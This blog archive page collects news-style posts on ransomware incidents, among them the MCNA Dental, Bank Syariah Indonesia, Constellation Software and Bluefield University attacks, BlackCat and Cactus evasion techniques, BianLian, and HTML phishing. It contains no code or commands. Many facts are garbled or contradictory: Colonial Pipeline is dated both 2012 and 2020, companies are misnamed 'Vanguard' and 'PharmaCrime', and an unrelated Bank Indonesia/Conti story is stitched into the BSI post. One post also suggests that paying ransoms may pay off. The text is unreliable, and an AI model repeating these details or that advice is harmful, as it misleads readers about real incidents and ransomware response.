Search This Blog

Showing posts with label Ransomware. Show all posts

9 Million Patients' Data Exposed by Ransomware Attack on US Dental Giant

 


A ransomware attack may have compromised nearly nine million individuals' personal information in the United States. This is due to the harm caused by an apparent attack on a dental health insurer — one of the country's largest.

According to Managed Care of North America (MCNA) Dental, a multinational dental insurance company headquartered in the United States, the company took notice of certain activities in its computer system on March 6, 2023. MCNA immediately stopped those activities and began an investigation.

As a result, despite those steps being taken, the LockBit ransomware – which acquired responsibility for the attack – is making a comeback with a threat to leak 700GB of data stolen from MCNA's network if the company does not pay the attackers a $10 million ransom. To allow anyone to download all of the data, reports suggest the group released the data on its website on April 7 for anyone to download.

There are several dental insurers in the United States. However, Managed Care of North America (MCNA) Dental claims to be the nation's largest dental insurer for children and seniors covered by government-sponsored plans. Among the notices the company posted on Friday, it stated it became aware on March 6 that "certain activities in our computer system took place without our permission" and that the company had decided to take action. After it was discovered that a hacker had gained access to their computer system between February 26 and March 7, 2023, the company became suspicious that there was a breach of security. 

A breach notice from MCNA ticks the typical boxes: it was discovered that a criminal could view and copy some information stored in our computer system using IDX, a ZeroFox Inc.-owned company. 

Names, addresses, dates of birth, telephone numbers, e-mail addresses, Social Security numbers, driver's licenses, and other government-issued identification numbers were among the information that was stolen. There was also information regarding health insurance details, dental care records, billing, and insurance details that were taken. 

According to MCNA Dental, the hackers also gained access to information about a patient's health insurance plan information, Medicaid ID numbers, billing and insurance claim information, and bills and insurance claims. 

During this time, PharMerica, a leading pharmacy service provider with over 2,500 facilities in the US and offering over 3,100 pharmacy and healthcare programs, announced a data breach that exposed nearly six million patients. PharMerica operates in more than 2,500 facilities across the country.

As part of the notification to Maine's attorney general regarding the data breach, PharmaCrime indicated that on March 14, its computer network was discovered to have suspicious activity on it. 

It was reported on March 7 that the LockBit ransomware gang was responsible for the attack, saying they were willing to publish 700 gigabytes of stolen data unless the victim paid a $10 million ransom. LockBit released the data on April 7 because MCNA failed to pay the ransom.

To assist people whose personal information may have been involved in this incident, the insurer is now sending individual letters directly to them. 

Several questions must be addressed about possible liability and responsibilities arising from LockBit having the data and publishing it versus MCNA publishing its breach notice. Until well over a month after LockBit first released its data, the company did not notify its patients of the breach, which gave threat actors ample opportunity to target those in the affected area before the company was fully notified.

In the past, security experts have told organizations that are victims of ransomware not to pay the attackers in exchange for the decryption keys, however, due to double-extortion attacks that can lead to both companies and their clients suffering long-term harm due to data leaks, the rules of the game have changed. There are several factors to consider before paying a ransom. It might be to your advantage to give in to a ransom demand. This will save you a lot of trouble and time in the long run. 

Organizations can take several measures to prevent ransomware attacks from gaining a foothold in their networks. These measures include enhancing their overall security defense posture and implementing multifactor authentication (MFA). 

As part of their efforts to prevent phishing attacks, organizations should also maintain strong controls to shield them since attackers often use credentials stolen in this way as an entry point into a network to launch ransomware attacks and other malicious software.

Using Ransomware to Extort Employers by Impersonating a Gang

 


In a court in Fleetwood, Hertfordshire, a 28-year-old United Kingdom man has been found guilty of serving his employer with a forged document and unauthorized access to his computer with criminal intent. 

SEROCU has released a press release explaining the conviction of Ashley Liles, a 29-year-old IT Security Analyst at a company in Oxford that was the victim of a ransomware attack in February 2018. According to the press release, Liles worked as an IT Security Analyst at the time. 

The cybercriminals contacted the company's executive team to demand a ransom payment, the same plan used in many ransomware attacks.

As part of the company's internal investigation efforts and the incident response initiative, Liles, as well as other company members and members of the police, joined the investigation and incident response effort. 

As a result, during this period, it is said that Liles tried to enrich himself from the attack by tricking his employer into paying him a ransom instead of the actual external attacker to enrich himself. 

The SEROCU announcement reads, "Instead of pursuing a criminal case against the company, Liles also began a further and secondary attack against the company unbeknownst to the police, his colleagues, or his employer." 

In addition to accessing more than 300 times the private emails of a board member, he also altered the original blackmail email sent by the original attacker and changed the payment information provided by the original attacker. 

A plan had been hatched to take advantage of the situation by diverting the payment from the payment account and sending it to Liles' cryptocurrency wallet. 

In addition to creating an almost identical email address, Lite created another email address that looked almost identical to the original attacker, and sent emails to his employer asking for payment, said SEROCU. 

Although the company owner refused to pay the attackers, a later internal investigation that had been underway at the time revealed that Liles had access to private emails, as evidenced by the IP address of his home, suggesting that he was responsible for the attack. 

By the time SEROCU's cyber-crime team stormed into Liles' home to take his computer, Liles was well aware of the investigation and had wiped all data from his devices. However, restoring incriminating data from Liles' computer was still possible, even though he had realized the investigation was closing in on him. 

During the hearing at Reading Crown Court, Liles pleaded guilty five years after he first denied any involvement in the case and pleaded guilty a second time. There is going to be a court date for this rogue employee on July 11th, 2023, he will be sentenced at that time.

Accusing someone of hacking into a computer without their permission is punishable by up to two years in prison in the UK, while blackmail is punishable by up to 14 years in prison.

Malicious Windows Kernel Drivers Utlized in BlackCat Ransomware Attacks

 

Researchers have discovered an end-point security evasion mechanism used by the group known as BlackCat. The new technique conceals the gang's defensive measures when inside a network. The cybercrime group was discovered employing signed Microsoft kernel drivers to control and terminate security processes installed on protected machines. 

As per the analysis, this is expected to become a standard technique in the arsenal of cybercriminals. Then, Microsoft revoked multiple Microsoft hardware developer accounts used in these assaults. BlackCat ransomware's end-point security evasion mechanism has been discovered. 

Affiliates of BlackCat have been known to employ a variety of defense evasion techniques in order to remain undetected in a system for as long as possible. The most recent method is the use of malicious kernel drivers that have been signed through  Microsoft hardware developer accounts. According to Trend Micro research, this enables to impair defenses on a victimized computer by manipulating, halting, and killing numerous processes on target end-points associated to security agents.

A kernel-mode driver will not operate if it is not signed by a trustworthy certification authority. According to a Microsoft Build article, the operating system would not enable untrusted drivers to function, and conventional procedures such as kernel debugging and test signing will be prohibited.

Trend Micro's data shows that this strategy has been successful in prior attacks carried out by BlackCat this year. Typically, hackers can sign malicious kernel drivers by abusing Microsoft signing portals, ututilizingeaked and stolen certificates, or using underground servers, which can provide cybercriminals using these approaches an advantage.

According to the analysis, these new approaches will most likely become part of a cybercriminal's toolkit. “Because of these added layers of protection, attackers tend to opt for the path of least resistance to get their malicious code running via the kernel layer (or even lower levels). This is why we believe that such threats will not disappear from threat actors’ toolkits anytime soon.”

BlackCat ransomware, also known as AlphaV, first appeared in November 2021, hitting targets in many countries including Australia, India, and the United States, seeking ransoms ranging from $400,000 to $3 million in cryptocurrencies Bitcoin or Monero.

The Russian group is reported to have ties to DarkSide, the group responsible for the legendary attack on the Colonial Pipeline in 2020, which crippled the oil supply system to the US Eastern Seaboard and prompted President Joe Biden to declare a national state of emergency. 

Data And Employees Of BSI Shared On The Dark Web By LockBit Ransomware Gang

 


An international data breach affecting one of Indonesia's leading Islamic banks, Bank Syariah Indonesia, caused significant disruptions to its normal operations and payment systems which in turn hampered the business flow. Customers’ personal and financial details have been compromised due to this breach. 

The infamous ransomware group, LockBit claims to have spread 1.5 TB data belonging to the customers and employees of Bank Syariah Indonesia, on the dark web sites. Millions of BSI customers' identity data was leaked by the LockBit gang. The gang did not receivethe demanded ransom in time which led to the same. 

Over the past few years, companies and government agencies have had several data breaches in Indonesia. A cybersecurity expert described it as one of the biggest breaches at a financial institution in the country. 

During the Bank Syariah Indonesia cyberattack, the ransomware group requested the termination of all services. The management of the company lied to their customers and partners that the stoppage was a result of the technical work they were carrying out. 

Earlier today, it was reported that LockBit 3.0 was distributing 1.5 TB of BSI bank data at a fantastic price to dark sites posted on a Twitter account named @darktracer_int. 

CNN Indonesia reports the attackers stole "non-critical data" belonging to Bank Indonesia employees during the incident. They then used ransomware payloads to infect several dozen systems within the bank's network before extorting money from the bank. 

According to the bank, there have been no reported impacts on BI's public services due to the incident, as first reported by Reuters. 

"BI is aware of a ransomware hack last month. We know we have been hit by a cyberattack. This is a crime, it is real, and we are exposed to it," Erwin Haryono, head of BI's communications department, told local media outlets that it is a crime. 

Following Bank Syariah Indonesia's cyberattack on 15 May, ransom payments were due by this date. As a result of the ransomware attack on Bank BSI, the group had access to the following data: 

Over 15 million individual records can be found in nine databases containing personal information. Customer service and employee service are both part of this. 

A person's name, phone number, address, account data, card details, and transaction details are collected. 

Legal documents are legally binding documents. 

In the bank, all internal and external services have passwords needed to access them. 

In a statement released on Wednesday, the central bank of Indonesia said it is confident that the country's payment system is safe and reliable for any transaction. 

Additionally, the authorities stated that they would continue to ensure that payment service providers meet all regulatory requirements in the future. BSI's payment system (under Bank Indonesia's supervision) has also returned to normal. 

BSI President and Chief Executive Officer Henry Gunardi announced on May 11 that ATMs and bank branches are now available to the public again. According to him, an important part of the restoration process was strengthening capacity and restoring key channels of communication. A BSI official explained that the disruption occurred on May 8 as a result of company maintenance on the company's information technology system. This maintenance was conducted to mitigate risks. 

A previous version of the ransomware group's communication with bank representatives between the dates of May 8 and May 13 had been published as well. As can be seen in the screenshots, the bank offered a payment of $10 million to recover the stolen data to get the data back. After requesting $20 million from LockBit, the company disappeared without a trace. 

Earlier this month it was reported that the LockBit ransomware group sent a tweet announcing the end of the negotiation period, and all of the stolen data from Bank Syariah Indonesia is now publicly available on the black market. 

After a month of being taken down, Bank BSI has not been able to return its systems to function. This is even after LockBit wrote a rant. A class action lawsuit is being filed as a result of users finding their data with a data leak and then going to court and bringing the case to court. 

Despite Bank Indonesia not stating which ransomware gang was responsible for the attack, Conti posted a series of files that it claims were stolen from Bank Indonesia's network today which they claim helped expose the attack. 

The ransomware group claims that if Bank Indonesia does not pay the ransom to them, 13.88 GB of information will be exposed to the public. 

As of earlier today, when BleepingComputer contacted a representative of Bank Indonesia, he did not have any comments to offer. It's imperative to remember that this type of Ransomware-as-a-Service (RaaS) is linked to the Russian cybercriminal group Wizard Spider, which is also responsible for other notorious malware, such as Ryuk, TrickBot, and BazarLoader. 

As soon as corporate workstations infected with BazarLoader or TrickBot malware are breached by these ransomware groups' affiliates, the ransomware group's affiliates gain remote control of the compromised computers using command and control systems. As soon as the Conti operators gain access to the victim's internal network, they will disrupt other devices scattered throughout the victim's network. This will spread malware.

In addition to Ireland's Department of Health (DoH) and Health Service Executive (HSE), Conti also attacks marketers RR Donnelly (RRD), who sell services to the government. 

There has also been a recent update to the FBI's advisory warning that an increased number of Conti ransomware attacks have been reported as a result of increased Conti activity. The FBI recently released an advisory warning regarding increased Conti activity.

BianLian Ransomware has Switched to Extortion-only Attacks, FBI Confirms

 

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a joint Cybersecurity Advisory from government agencies in the United States and Australia, alerting organizations about the latest tactics, methods, and procedures (TTPs) utilized by the BianLian ransomware group. 

BianLian is a ransomware and data extortion gang that has been attacking vital infrastructure in the United States and Australia since June 2022. The advice, which is part of the #StopRansomware effort, is based on FBI and Australian Cyber Security Centre (ACSC) investigations as of March 2023. Its goal is to provide information to defenders that will help them to alter defenses and boost their security posture against BianLian ransomware and other similar threats.

BianLian used a double-extortion technique at first, encrypting systems after collecting private data from victim networks and then threatening to leak the contents. However, after Avast produced a decryptor for the ransomware in January 2023, the organization shifted to extortion based on data theft rather than encrypting systems.

This strategy remains appealing since the occurrences are essentially data breaches that result in reputation damage for the victim, impair customer trust, and present legal issues. According to CISA, BianLian compromises systems by exploiting genuine Remote Desktop Protocol (RDP) credentials obtained through first-access brokers or through phishing.

BianLian then conducts network reconnaissance using a tailored backdoor built in Go, commercial remote access tools, and command-line and scripts. Exfiltrating victim data via the File Transfer Protocol (FTP), the Rclone tool, or the Mega file hosting service is the final stage.

BianLian uses PowerShell and the Windows Command Shell to stop running processes connected with antivirus technologies in order to avoid identification by security software. The Windows Registry is also tampered with in order to defeat the tamper protection provided by Sophos security solutions.

Limiting the use of RDP and other remote desktop services, prohibiting command-line and scripting activities, and restricting the use of PowerShell on important systems are among the proposed mitigations. The alert suggests the following  methods to help defend the network:
  • Audit and control the execution of remote access tools and software on your network.
  • Restrict usage of remote desktop services like RDP and enforce stringent security measures.
  • Limit PowerShell use, update to the latest version, and enable enhanced logging.
  • Regularly audit administrative accounts and employ the principle of least privilege.
  • Develop a recovery plan with multiple copies of data stored securely and offline.
  • Adhere to NIST standards for password management, including length, storage, reuse, and multi-factor authentication.
  • Regularly update software and firmware, segment networks for improved security, and actively monitor network activity.
"FBI, CISA, and ACSC encourage critical infrastructure organizations and small- and medium-sized organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of BianLian and other ransomware incidents," as per CISA.

The full bulletins from CISA and the ACSC contain more specific information on the recommended mitigations, indications of compromise (IoCs), command traces, and BianLian approaches.

Hackers Come up With Innovative Methods to Enforce Ransomware Payment

 

Ransomware is still one of the most serious cybersecurity risks that organizations and governments face. However, as organizations make a conscious decision to deny ransom payment demands, cybercriminals are devising new methods to recover ransom from their victims. 

The fall of the most known ransomware gang, Conti, in May 2022, was expected to result in a significant decrease in ransomware attacks. Tenable discovered that 35.5% of breaches in 2022 were caused by a ransomware assault, a slight 2.5% decline from 2021. Meanwhile, ransomware payouts are expected to fall by 38% in 2022, prompting hackers to embrace more professional and corporate approaches to assure larger returns, according to Trend Micro's Annual Cybersecurity Report.

“Cybercriminals increasingly have KPIs and targets to achieve. There are specific targets that they need to penetrate within a specific time period. It has become a very organized crime because of the business model that the ransomware groups follow because of which they have started increasing the pressure,” said Maheswaran S, country manager at Varonis Systems. 

Double extortion is a strategy that ransomware criminal groups are increasingly employing. The ransomware group, in addition to encrypting the files on the victim's devices, downloads private data from the victim's machine in the double extortion method.

“This gives them more leverage, since now the question is not only about decrypting the locked data but also about leaking it,” Mehardeep Singh Sawhney, a threat researcher at CloudSEK, said.

The BlackCat ransomware group is one example of this. According to CloudSEK, this ransomware gang can encrypt and steal data from victims' PCs as well as other assets operating on them, such as ESXi servers. 

According to cybersecurity firm Redacted, ransomware organization BianLian altered the focus of its assaults in March from encrypting victims' files to extortion as a means of extracting cash. Some ransomware criminals take the triple extortion strategy a step further. 

The ransomware gangs encrypt files, extract sensitive data, and then add distributed denial-of-service (DDoS) attacks to the mix in the triple extortion strategy. If the ransom is not paid, not only will the files stay locked, but regular services will be affected by DDoS. 

Another strategy used by ransomware groups to put pressure on target organizations is to contact the company being attacked's customers or stakeholders directly. Because this harms the victim organization's reputation and can often result in financial damages greater than the ransom, victim organizations tend to pay up, according to Maheswaran. 

According to Sawhney, the ransomware groups directly contact the victims' consumers via email or phone calls. The Cl0p ransomware organization, for example, emailed stakeholders and customers of their victims, alerting them that their data will be disclosed.

“Cl0p also maintained a website where a list of their victims and stakeholders was updated every day. This adds more pressure on the victim firm, making it seem like the fastest way to end the attack is to pay the ransom amount,” Sawhney said.

Lorenz ransomware and LockBit, in addition to contacting customers and stakeholders, released their ransom discussions with victim organizations on their leak site. "It can further damage the company's reputation and increase the perceived urgency of the ransom demand," cybersecurity firm Cyble stated in research.

According to Maheswaran, while organizations are deploying more controls to protect assets that store or access critical data, they do not essentially deploy the right controls around data, which is critical for making an attacker's job difficult in gaining access to or corrupting data.

To effectively respond to ransomware outbreaks, organizations' cybersecurity solutions must be responsive, agile, and easily scalable, which is best achieved through a combination of cloud and machine learning analytics, said Harshil Doshi, country director at Securonix.

“It is easier to avoid paying the ransom if you detect the risk before encryption occurs. Or you can avoid ransomware response workflows altogether by having an effective endpoint backup strategy,” Doshi added. 

To safeguard employees from clever attackers, organizations should take several measures, including restricting access to critical data to minimize the damage attackers could cause and identifying vulnerable data. Additionally, adopting multifactor authentication reduces the likelihood of being hacked by 99%, and monitoring user activity for any signs of suspicious behavior is critical. 

It is also essential to have standard operating procedures for responding to ransomware incidents and user awareness programs to identify and report breaches, according to Maheswaran. CloudSEK recommends backing up critical data in a secure location to restore it in case of a ransomware attack. Organizations must keep their operating system, software, and security tools up to date with the latest security patches and updates, using reliable antivirus and antimalware software regularly updated.

VMware ESXi Ransomware on the Rise Due to Leaked Babuk Code

 

Security experts claim to have discovered ten distinct ransomware families that have recently diverged from Babuk, a ransomware outbreak whose source code was exposed online in 2021. 

Hackers have been using leaked source code from well-known ransomware firms like LockBit, Conti, and REvil for years, experts in the field have long warned. SentinelLabs claimed in research made public on Thursday that about a dozen organisations have created their own malware based on Babuk.

The Babuk Locker ransomware builder was made publicly available online in June 2021, making it simple for any would-be criminal organisation to enter the ransomware market with little to no development work. 

Hackers are drawn to the Babuk Locker "builder" because it allows them to make unique variations of the Linux-based Babuk Locker ransomware that can be used to attack the common ESXi servers used by big organisations and corporations.

“Over the past two years, organized ransomware groups adopted Linux lockers, including ALPHV, Black Basta, Conti, Lockbit, and REvil,” SentinelLabs’ Alex Delamotte stated. “These groups focus on ESXi before other Linux variants, leveraging built-in tools for the ESXi hypervisor to kill guest machines, then encrypt crucial hypervisor files.” 

According to Delamotte, the ten versions they found appeared in the second half of 2022 and the first part of 2023, indicating "an increasing trend of Babuk source code adoption." 

SentinelLabs discovered connections between the stolen Babuk source code and the ESXi lockers of numerous well-known ransomware organisations, including Conti, REvil, Play, and Ransom House, which have all been linked to some of the most damaging intrusions in the past two years.

In order to create ESXi lockers for themselves, smaller ransomware organisations have adopted the Babuk source code. 

To contrast it to the other versions of the Babuk that are available online, SentinelLabs created what they referred to as a "baseline" Babuk. The way the malware encrypted documents and coding resemblances were among the numerous connections they discovered. 

The researchers also noted that Babuk and ESXiArgs, which raised concerns in February after more than 3,800 organisations in the US, France, and Italy were attacked, hardly had any similarities. At the time, some falsely accused Babuk of being responsible for the series of attacks that targeted Rice University, the Georgia Institute of Technology, and the Supreme Court of Florida.

Emails With HTML Attachments are Still Popular Among Phishing Scammers

 


Cybercriminals are increasingly using malicious HTML files to attack computers, according to a recent study conducted by security researchers. In addition to this, Barracuda Networks' study also revealed that malicious files now account for over half of all HTML attachments sent via email. There has been a significant increase in applications compared to last year. 

Is there a phishing scam using HTML attachments you know of? To prevent cybercriminals from contacting C7C servers to download crypto-malware, Trojan horses, or other nasty nasties through email, HTML attachments are sent instead of email. 

Phishing scams based on HTML emails have been around for a long time, but people aren't aware of them, and they are increasingly falling for the same. 

There is a high chance that you checked your email more than once this past weekend. This is despite it being a holiday weekend for many people.

Even though HTML files continue to be one of the most common attachments used in phishing scams in 2022, it shows that the method is still one of the most effective methods of getting past spam detection software and delivering spam to targets who are looking for it. 

HTML (HyperText Markup Language) is a markup language developed to display documents created for display in a web browser, according to Wikibooks. The capabilities of technologies such as Cascading Style Sheets (CSS) and programming languages such as JavaScript can make it easier to do this.

It is possible to render HTML documents as multimedia web pages using a web server or a local storage device that receives HTML documents from a web server. An HTML document describes the semantics of a web page and includes clues that indicate how it should appear to the end user. HTML can also describe the content of a web page. 

When victims are sent phishing emails using HTML files, they are frequently directed to malicious websites, downloaded files, or phishing forms that can be displayed locally within their browsers on their computers.

It is common for email security software to overlook attachments when delivering messages to targets since HTML does not pose a threat to the recipients; as a result, messages are delivered successfully to their inboxes. 

Something is interesting about this recent increase in malicious HTML files. This does not seem to be the result of mass attack campaigns in which hackers send the same attachments to many victims. 

To protect against cyberattacks, it is now more imperative than ever to implement appropriate cybersecurity measures. The key to preventing such attacks is what the report uses as an example of how to prevent them. 

It has been reported that the cybercriminal groups DEV-0238 and DEV-0253 have also been using HTML smuggling to deliver keyloggers through HTML attachments they have sent using HTML smuggling. HTML smuggling has also been associated with the cybercriminal group DEV-0193 delivering Trickbot malware through HTML smuggling. 

HTML attachments are used in phishing attacks 


HTML attachments spammed by phishing sites are the most common type of HTML attachment. There is generally no malicious code within the HTML file itself. This means it does not have any malicious code that launches arbitrary code into the system even though it looks benign. Despite this, it is recommended to treat this attachment with caution. By mimicking the look of a sign-in page for a service such as Microsoft, Google, or a major online bank, the scam could lead to the user entering their credentials into the form and submitting it, resulting in a malicious website that takes over their account. 

When it comes to spam forms and redirection strategies in HTML attachments, hackers usually use several tactics for implementation. These tactics range from simple redirections to obfuscating JavaScript to disguise phishing forms to steal personal information. 

A secure email gateway and antivirus solution can check email messages for attachments to see if they contain malicious URLs, scripts, or other threats. This could threaten users' security. 

The majority of cybercrime attacks are composed of malicious phishing forms or redirects created using JavaScript in HTML attachments. This is done to avoid detection. 

Considering that malicious files can damage your device and your organization, it has become increasingly important to ensure you take the necessary precautions to keep yourself safe from them. It is imperative to know how to prevent such attempts by taking the following precautions: 

The infrastructure of your email system will be crucial in this case. Antivirus software and firewalls should be updated regularly to function properly. Furthermore, a solid plan of action must be implemented for data loss prevention. DMARC protocols should be defined for your domain as the most effective way to ensure communications security. 

Authenticating with two-factor authentication is necessary, followed by zero-trust access based on multi-factor authentication. You can be sure that your employees will be protected even if they fall victim to hacker attacks, credential theft, and phishing. This is because they will evaluate their credentials, device, location, time zone, and history of access and limit breaches. 

The importance of employee training on recognizing and reporting malicious HTML attachments shall be recognised. Employees must be trained on how to recognize and report attachments from unknown sources, especially those containing malware. Cybersecurity threats can have serious consequences for a business organization if it is not prevented.

Certainly, obfuscation is one of the common denominators among all the spammed HTML attachments in this case. Having to deal with a threat like this at the email gateway layer demonstrates just how difficult it is to detect.

Cactus: New Ransomware Encrypts Itself to Evade Detection


Cactus, a newly discovered ransomware operation has apparently been exploiting vulnerabilities in VPN appliance vulnerabilities to gain initial access to the networks of "large commercial entities."

Although the new threat actor uses the usual file encryption and data stealing techniques used in ransomware attacks, it encrypts itself to evade detection by antivirus software, making it exceptionally challenging to eliminate.

Encrypted Configuration Twist

According to the cybersecurity experts at Kroll, the Cactus ransomware infiltrates its victims' networks by exploiting security flaws in VPN appliances. The researchers discovered that the hackers used compromised service accounts to access these networks through VPN servers.

The self-encryption attribute of Cactus ransomware is what makes it significant. Cactus operators utilize a batch script and the popular compression tool 7-Zip to obtain the encryptor binary to accomplish thisOnce the binary is extracted, the initial ZIP archive is eliminated, and the binary is executed with a specific parameter, making it challenging for antivirus software to identify the threat.

Kroll investigators further explain that the script is run using three separate switches: -s for initialization, -r for loading a configuration file, and -i for encryption.

Once within the targeted network, the attackers employ an SSH backdoor along with scheduled tasks to maintain their presence while conducting a number of reconnaissance operations, such as pinging remote hosts, identifying endpoints, and locating user accounts.

The Cactus ransomware executes a batch script that disables standard antivirus software in order to cause the most damage. The attackers exfiltrate files from infected PCs to a cloud server before automatically encrypting them with a PowerShell script.

While detailed information regarding the Cactus operation, the victims they target, and if the hackers follow their promise to provide a reliable decryptor if paid are not yet available, applying the most recent vendor software updates, keeping an eye out for significant data exfiltration attempts, and acting fast should guard against the most destructive and final stages of a ransomware attacks.


Constellation Software Cyberattack Claimed by ALPHV

 


According to the ALPHV/BlackCat ransomware group's claims, Constellation Software's network was compromised as a result of a cyberattack, it was also mentioned in the recent posting on the ransomware gang's leak site. Essen Medical Associates, as well as a Canadian software company, were victimized by the ransomware gang. 

A statement by Constellation Software Inc., a Toronto-based company, revealed that on Wednesday, it had been affected by a cyber-security incident that affected only one of its IT infrastructure systems. 

As a result, some limited personal information was affected by this incident. Additionally, Constellation's businesses also impacted a limited number of business partners. Rather than directly contacting these individuals or business partners, Constellation's operating groups and businesses will now contact them.  

Those who had their data compromised and those who have business associates in the affected area have also been contacted for further information. 

A small number of individuals had their private information compromised in the incident. Some data belonged to a small number of business partners of various Constellation businesses that were potentially affected. 

The constellation software company is composed of six divisions dedicated to acquiring, managing, and growing software companies. These divisions are Volaris, Harris, Jonas, Vela Software, Perseus Group, and Topics. 

As a Canadian company that employs over 25,000 people in North America, Europe, Australia, South America, and Africa, and generates $4 billion in revenue every year, Vanguard has a global presence. It has also acquired more than 500 companies in the software industry since 1995 and provides services to more than 125,000 customers in more than 100 countries. 

According to Constellation, the incident involved a small number of systems involved in internal financial reports and data storage related to them. There was a requirement for Constellation's operating groups and businesses to comply with this. There was no impact on the operations and businesses of Constellation's autonomous IT systems that were within its control. In addition, the company's business operations have not been adversely affected by the incident. 

Listed on ALPHV/BlackCat's leak site was the list of attachments the ransomware group had gathered from two data breaches that had been compromised. 

Following the Essen Medical Associates cyberattack, 24 attachments were breached as a result, although 25 attachments were breached following the Constellation Software cyberattack.   

Statement from the company regarding the cyberattack on Constellation Software 

As a result of the ALPHV/BlackCat leak site post released shortly after the announcement of the cyberattack, Constellation Software issued a press release confirming the attack. On April 3, a limited number of the company's IT systems were compromised due to a cyber incident reported by the company. 

It is understood that only a few business and operating groups within the organization utilize the organization's financial reporting and data storage systems. These groups provide internal financial reporting to the organization.   

Constellation's independent IT systems are not impacted by this incident in any shape or form, so it is not an issue with any of its operating groups or businesses. According to the press release issued, Constellation's business operations have not been impacted by the incident.   

ALPHV has already leaked some documents containing business information online to prove they were accessing and exfiltrating files from Constellation's network. This information can be found in the documents they leaked.  

In November 2021, the DarkSide/BlackMatter gang launched a ransomware operation that has been hacked to get the keys to the country. This was believed to be a rebranding of them. First becoming aware of the group as DarkSide, they attacked the Colonial Pipeline in 2012 and immediately found themselves in the crosshairs of international law enforcement. 

As a result of the servers being seized in November, they were forced to shut down operations one month later in July 2021. This was even though they rebranded themselves as BlackMatter one month later. The Emsisoft decryptor exploits a vulnerability in ransomware to exploit a weakness in the encryption algorithm.   

To demonstrate the access that ALPHV gained and the exfiltration of files from Constellation's network, ALPHV has already posted many documents online that contain business information about Constellation. 

A lot of people are currently aware of the ALPHV group as one of the biggest ransomware threats threatening corporations all around the globe. It was also named as the most likely attacker by the FBI in April, after they hacked over 60 companies between November 2021 and March 2022 as part of a ransomware operation. According to the FBI, ALPHV has "extensive networks and extensive experience with ransomware operations."

Mobile Menace: McAfee's 2023 Report on the Top Mobile Threats

Mobile security

Mobile Data Security: Insights from McAfee's 2023 Consumer Mobile Threat Report

Mobile devices are an essential part of our lives today. From staying connected with our loved ones to handling our finances and work-related tasks, smartphones have become indispensable. However, this convenience comes with a price. 

As our dependence on mobile devices increases, so do the risks associated with mobile data security. In this blog post, we will explore some insights from McAfee's 2023 Consumer Mobile Threat Report and discuss how we can protect our mobile data.

According to the report, cybercriminals are getting more sophisticated in their approach toward mobile threats. They are using advanced techniques such as ransomware, malware, and phishing attacks to target mobile devices. 

One of the primary reasons behind the rise in mobile malware is the increase in app usage. Malicious apps often masquerade as legitimate ones, making it challenging to identify them. Once they gain access to your device, they can steal your personal information or lock your device, demanding a ransom payment. Another alarming trend highlighted by the report is the rise of phishing attacks. 

Cybercriminals are using social engineering techniques to trick users into providing their login credentials, credit card details, or other sensitive information. They do this by creating fake login pages that look identical to the original ones. Once you enter your details, criminals can use them to gain unauthorized access to your accounts.

McAfee's report suggests the following these things-

Stay safe from malicious apps

Millions of apps are available on the App Store and Google Play Store, but some of them may contain malware, which can provide hackers access to your device's data once downloaded. 

McAfee's Mobile Threat Report advises that users should be particularly cautious when downloading image editors and photography apps, business and phone utility apps, gaming tips and cheats, and social media tools. 

Users should also be wary of fake ChatGPT apps or those that claim to be powered by GPT-4. Additionally, users should be cautious of apps that charge excessively, which could be a red flag, as ChatGPT, Google's Bard, and Microsoft's Bing are all free to use on the web.

If an app has infected your device with malware, there may be some indicators such as increased mobile data consumption, rapid battery drain, subscriptions that you did not knowingly sign up for, or unfamiliar apps on your home screen. 

The report suggests running a virus scan with a trusted security app, restarting your device, deleting any suspicious software, or performing a factory reset as a last resort if your phone has been infected with malware.

Staw away from scammers

You should be cautious of scammers who may reach out to you through various means such as email, text, or social media direct messages. In the past, scams could be identified by incorrect grammar, spelling, or syntax in their messages. 

The report suggests scammers are now leveraging AI tools like ChatGPT to produce convincing and accurate scams without grammatical errors. This means that users need to conduct more thorough investigations to determine whether they are being scammed.

When trying to identify a scam, it's essential to look for certain indicators. Scammers often try to make you act urgently, contact you from unfamiliar numbers or names, and pressure you to provide personal information. You should remain vigilant and cautious when receiving unexpected messages or requests for information.

Keep a watch over kids

The risk of malware is not limited to work-related apps, such as productivity tools or photo editors. According to McAfee, malicious apps can also be disguised as apps aimed at children. These apps can be promoted on popular social media platforms like Instagram, TikTok, and YouTube and often target children by advertising cheats or gaming mods for games like Minecraft and Roblox. 

As children do not possess the same level of critical thinking skills as adults, it is essential to help your children keep their devices safe.

To safeguard your child's device, McAfee recommends setting clear boundaries on app downloads and ensuring that your child consults with you before downloading any apps so that you can verify their legitimacy. Additionally, you should lock your child's device to prevent them from entering any payment information into malicious apps. 

It's also important to keep track of any in-app purchases your child wishes to make, as these can be for game add-ons, character skins, or upgrades, which can be expensive. As these apps target children, your child may be misled into using your money to make costly purchases.

The Ransomware Gang Targets University Alert Systems

 


"RamAlert," an emergency broadcast system used by Bluefield University to communicate with its students and staff, has been hijacked by the Avos ransomware gang. The gang sent SMS texts and emails informing them that their data had been stolen and was in the process of being released. With more than 900 students and a small campus in Bluefield, Virginia, Bluefield is a private university.

In a recent announcement, a university in the Virginia area advises students to be cautious of texts received via the school's mass alert system. This was in response to a ransomware group alerting the entire campus that a cyberattack is taking place. 

It was announced on Sunday that Bluefield University, a private Baptist school in Bluefield, Virginia that serves approximately 1,000 students, had shut down its systems for an unknown period as a result of a recent cyber-attack and that their systems would remain down for an unknown period. 

According to hacker messages posted on Bluefield University's RamAlert, an app that sends text and email messages to students and faculty during school emergencies, hackers send a series of messages urging them to go over to the university's president and state their concerns. 

Students and faculty members of Bluefield University were informed of a cyberattack that took place on April 30. This attack affected their IT systems and personal information. Faculty and staff had access to most university apps and websites before the incident. As a result, no evidence of identity theft or financial fraud had been reported to the University at that time. 

Avos ransomware gang hijacked the university's emergency broadcast system, RamAlert, on May 1 in an attempted takeover of the system that is used for emergency broadcasts. It was done to inform students and faculty of data theft using texts and emails.  

Bluefield University filed a police report on Tuesday alleging that a ransomware group had used the RamAlert system used by the university to send threatening messages to all students and staff members.

If the university's president refused to pay the ransom demanded by the ransomware group, the ransomware group threatened to continue disrupting the university. 

Brett Callow shared the news on Twitter revealing that the hacker has approximately 1.2 TB of Bluefield's data. This is according to a message sent to Bluefield's student body and staff. Bluefield's president received an email alert from the hackers informing him to pay the full ransom demanded by them. The hackers instructed students and staff to pressure him to do so.  

